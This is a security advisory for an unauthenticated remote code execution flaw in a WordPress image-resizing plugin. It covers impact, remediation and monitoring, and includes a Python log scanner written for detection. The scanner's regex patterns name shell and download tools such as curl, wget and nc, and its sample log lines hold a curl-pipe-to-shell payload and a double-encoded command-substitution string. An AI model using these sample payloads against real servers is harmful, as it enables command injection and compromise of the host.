CVE-2025-8723

Cloudflare · Cloudflare Image Resizing plugin for WordPress

A critical remote code execution (RCE) vulnerability has been identified in the Cloudflare Image Resizing plugin for WordPress.

Executive summary

The flaw allows an unauthenticated attacker to execute arbitrary code on the server, which can lead to complete compromise of the affected website, theft of its data, and a foothold for further intrusion into the surrounding network. Because exploitation requires no credentials and the impact is severe, remediation should not wait for a scheduled maintenance window.

Vulnerability

The vulnerability exists within the plugin's hook_rest_pre_dispatch() method, which, as its name indicates, is a callback attached to the WordPress rest_pre_dispatch filter. That filter fires for every REST API request before the request is matched to a route, so the route's permission_callback has not yet run and the plugin's callback executes for any caller, authenticated or not, whatever endpoint the request names. The callback performs no capability or nonce check of its own, and it passes attacker-controlled request data into a command execution path without sanitizing it. A crafted REST request can therefore inject and execute arbitrary commands as the web server user, which amounts to a full compromise of the host.

Business impact

This vulnerability is rated as critical severity with a CVSS score of 9.8. A successful exploit gives the attacker code execution as the web server user: full control of the WordPress application, access to everything that user can read (including the database credentials in wp-config.php), and a starting point for escalating privileges on the host. The business consequences include theft of sensitive customer data, financial information, or intellectual property; website defacement and reputational damage; and use of the compromised server to launch further attacks against other internal systems or external targets.

Remediation

Immediate Action: Update the Cloudflare Image Resizing plugin for WordPress to the latest version, which contains the fix; if the plugin is not needed, deactivate and delete it instead. Patching closes the entry point but does not undo an earlier compromise. After updating, review web server access logs and system logs from the period before the patch for exploitation attempts, and treat any hit as an incident to investigate (new admin users, modified or added PHP files, scheduled tasks) rather than a near miss.

Proactive Monitoring: Security teams should watch web server logs for unusual or malformed requests to the WordPress REST API. Cover both entry points: /wp-json/ under pretty permalinks, and the ?rest_route= query form used when they are disabled. Because the vulnerable callback runs on the rest_pre_dispatch filter, which fires before a request is matched to a route, do not limit the search to paths that name the plugin; any REST request can carry the payload. Look for shell command syntax, or URL-encoded and double-encoded equivalents of it, in request parameters and bodies. On the host, watch for child processes spawned by the web server user (e.g., www-data, apache) that the site has no reason to start, such as shells, curl or wget.
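The monitoring advice above, as an added example that is not part of this advisory or of the plugin: a Python scanner that runs over constructed access log lines in the Apache/nginx combined format. It recognises both REST entry points (/wp-json/ and ?rest_route=), decodes each parameter value a second time to surface double-encoded payloads, and flags shell metacharacters and download-and-execute tooling in parameter values. The parameter names and payloads in the sample lines are assumptions for illustration, not the request pattern of this CVE, and the heuristics are generic, so treat them as a starting point to tune against your own traffic.

```python
"""Heuristic scan of web-server access logs for WordPress REST API requests
that carry shell-command syntax. Added example; not the advisory's or the
plugin's code. Requires Python 3.9.2+ for parse_qsl(separator=...)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache/nginx "combined" format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) '
)

# Generic heuristics, not a signature for this CVE: command separators and
# download/execute tooling rarely belong in a REST parameter value.
SHELL_META = re.compile(r'[;|`]|\$\(|&&|\n')
CMD_WORDS = re.compile(r'\b(?:sh|bash|curl|wget|nc|python\d?|perl|php)\b', re.I)


def parse_target(target):
    """Return (path, [(key, value)], double_encoded) for a request target.

    parse_qsl decodes each value once; decoding a second time exposes
    double-encoded payloads such as %2526 -> %26 -> &. The separator is
    pinned to '&' so a ';' inside a value is not mistaken for a delimiter.
    """
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    params, double = [], False
    for key, val in parse_qsl(parts.query, keep_blank_values=True, separator="&"):
        again = unquote_plus(val)
        double = double or again != val
        params.append((key, again))
    return path, params, double


def is_rest_request(path, params):
    # Both REST entry points: pretty permalinks (/wp-json/...) and the
    # ?rest_route=... form used when pretty permalinks are disabled.
    return "/wp-json/" in path or any(k == "rest_route" for k, _ in params)


def classify(line):
    """Return a dict describing a suspicious REST request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params, double = parse_target(m.group("target"))
    if not is_rest_request(path, params):
        return None
    reasons = set()
    for key, val in params:
        if key == "rest_route":  # the route name itself is not a payload
            continue
        if SHELL_META.search(val):
            reasons.add("shell metacharacters")
        if CMD_WORDS.search(val):
            reasons.add("command keyword")
    if double:
        reasons.add("double-encoded parameter")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"),
            "status": m.group("status"), "path": path,
            "reasons": sorted(reasons)}


def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (not real traffic); the "image" parameter and the
# payloads are illustrative assumptions, not this CVE's request pattern.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2025:13:55:36 +0000] "GET /wp-json/wp/v2/posts?per_page=5&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2025:13:56:01 +0000] "POST /wp-json/wp/v2/media?image=x;curl%20http://203.0.113.9/x.sh|sh HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    '198.51.100.7 - - [10/Oct/2025:13:57:12 +0000] "GET /?rest_route=/wp/v2/users&image=%2524%2528id%2529 HTTP/1.1" 200 812 "-" "curl/8.4"',
    '203.0.113.5 - - [10/Oct/2025:13:58:40 +0000] "GET /blog/?s=cat%3B+dog HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because rest_pre_dispatch callbacks run before a request is matched to a route, the scanner deliberately does not filter on a plugin-specific path; the payload can ride on any REST route, including core ones such as /wp/v2/media. The fourth sample line shows the same metacharacter in a non-REST search query being ignored, which keeps the alert volume down. A "command keyword" hit on its own is a weak signal (file names such as image.php trigger it); a metacharacter or double-encoding hit alongside it, especially from an unfamiliar client string or with a 5xx status, is what to triage first.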

Compensating Controls: If patching cannot happen at once, place a Web Application Firewall (WAF) in front of the site with rules that block shell metacharacters and their URL-encoded and double-encoded variants in REST requests, matching both the /wp-json/ path and the ?rest_route= query form. As a stronger stopgap, restrict the REST API to authenticated users until the patch is applied; WordPress provides the rest_authentication_errors filter for this, and it runs before rest_pre_dispatch, so it cuts the vulnerable callback off from anonymous callers. Test the restriction first, because anonymous front-end features that call /wp-json/, such as forms or theme widgets, will stop working while it is in place.

Exploitation status

Public exploit available: No

Analyst recommendation

This vulnerability represents an extreme risk to the organization. Given the critical 9.8 CVSS score and the unauthenticated remote code execution it enables, all instances of the affected Cloudflare Image Resizing plugin must be identified and patched as the highest remediation priority. Although it is not currently listed in the CISA KEV catalog, its severity warrants an emergency response, and any WordPress instance that ran the vulnerable plugin exposed to the internet should be checked for signs of prior exploitation as part of that response.